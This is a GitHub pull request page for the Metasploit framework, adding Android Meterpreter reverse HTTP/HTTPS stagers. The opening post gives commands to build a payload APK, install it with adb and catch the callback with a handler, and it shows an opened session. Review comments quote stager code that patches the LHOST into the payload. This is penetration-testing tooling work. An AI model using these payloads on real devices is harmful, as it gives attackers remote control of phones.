Android payload reverse_http & reverse_https #3038

Closed
wants to merge 4 commits into
from

Projects

None yet

4 participants

@AnwarMohamed
Contributor

./msfpayload android/meterpreter/reverse_https LHOST=10.0.0.1 R > meterp.apk
adb install meterp.apk
adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
./msfconsole -x "sleep 2; use exploit/multi/handler; set payload android/meterpreter/reverse_http; set LHOST 10.0.0.1; exploit"

[] Started HTTPS reverse handler on https://0.0.0.0:4444/
[
] Starting the payload handler...
[] 10.0.0.101:42260 Request received for /RJvF_pamHmO5gqaaSUb5y...
[
] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.101:42260) at 2014-02-26 02:22:58 +0200

meterpreter > sysinfo
Computer : localhost
OS : Linux 3.0.31-302285 (armv7l)
Meterpreter : java/java

@jvennix-r7 jvennix-r7 commented on an outdated diff Mar 2, 2014
modules/payloads/stagers/android/reverse_http.rb
+ 'Author' => 'anwarelmakrahy',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'android',
+ 'Arch' => ARCH_DALVIK,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Stager' => {'Payload' => ""}
+ ))
+
+ register_options(
+ [
+ OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+ ], self.class)
+ end
+
+ def string_sub(data, placeholder, input)
+ data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
@jvennix-r7
jvennix-r7 Mar 2, 2014 Contributor

If you wrote it like:

data.gsub!(/#{placeholder}\s+/) do |match|
  placeholder + input + ' ' * (match.length - input.length - placeholder.length)
end

You could call it a bit easier:

string_sub(classes, 'ZZZZ', 'http://0.0.0.0')

If you have to preserve the spacing, you should probably also validate the length of input as well (make sure it is not longer than the match.length - placeholder.length in the gsub block).

@jvennix-r7
jvennix-r7 Mar 2, 2014 Contributor

This function should also be moved into Msf::Payload::Dalvik, since any payload dealing with android meterpreter will need it (it is repeated in both reverse_tcp, reverse_https, and reverse_http now).

@jvennix-r7
Contributor

It would be good to land this before/at the same time as @timwr's changes, since reverse_http over cell is probably going to be much more reliable than reverse_tcp.

@timwr timwr commented on an outdated diff Mar 3, 2014
modules/payloads/stagers/android/reverse_http.rb
+ string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST']
+ string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT']
+ string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+ jar.add_file("classes.dex", fix_dex_header(classes))
+
+ files = [
+ [ "AndroidManifest.xml" ],
+ [ "res", "drawable-mdpi", "icon.png" ],
+ [ "res", "layout", "main.xml" ],
+ [ "resources.arsc" ]
+ ]
+
+ jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+ jar.build_manifest
+
+ x509_name = OpenSSL::X509::Name.parse(
@timwr
timwr Mar 3, 2014 Contributor

can you move the signing code to dalvik.rb too please? It's duplicated 3 times currently.

@timwr timwr commented on an outdated diff Mar 3, 2014
modules/payloads/stagers/android/reverse_https.rb
+ include Msf::Payload::Stager
+ include Msf::Payload::Dalvik
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Dalvik Reverse HTTPS Stager',
+ 'Description' => 'Tunnel communication over HTTPS',
+ 'Author' => 'anwarelmakrahy',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'android',
+ 'Arch' => ARCH_DALVIK,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Stager' => {'Payload' => ""}
+ ))
+
+ @class_files = [
@timwr
timwr Mar 3, 2014 Contributor

I don't think this does anything, and you shouldn't need it because everything is compiled inside classes.dex (unlike java, which builds a .jar from the given class files) at the moment.

@timwr timwr commented on an outdated diff Mar 3, 2014
modules/payloads/stagers/android/reverse_https.rb
+ register_options(
+ [
+ OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+ ], self.class)
+
+ end
+
+ def generate_jar(opts={})
+ u = datastore['LHOST'] ? datastore['LHOST'] : String.new
+ raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32
+
+ jar = Rex::Zip::Jar.new
+
+ classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+
+ string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST']
@timwr
timwr Mar 3, 2014 Contributor

Why not just use the syntax http(s)://LHOST:LPORT?
Then just new URI(URI).openConnection() on the java side?

@jvennix-r7
Contributor

Note that this requires landing the PR rapid7/metasploit-javapayload#12

@OJ
Contributor
OJ commented Mar 5, 2014
@AnwarMohamed
Contributor

any hopes to merge it soon ?

@jvennix-r7
Contributor

Processing...

@jvennix-r7
Contributor

Verification:

  • reverse_tcp apk gets a meterpreter session
  • reverse_https apk gets a meterpreter session
  • reverse_http apk gets a meterpreter session
  • reverse_http maintains a session despite communication failures
@jvennix-r7
Contributor

Excellent, this looks good to merge. I am going to hold off merging this and the associated javapayload PR until monday, since we want to land this alongside @timwr's dalvik stager additions, and there are some merge conflicts to resolve first. Then we can push the rebuilt binaries together.

@jvennix-r7
Contributor

Closing this as it will be merged with #3086

@jvennix-r7 jvennix-r7 closed this May 13, 2014
@AnwarMohamed AnwarMohamed deleted the AnwarMohamed:reverse_http_s branch Jun 3, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment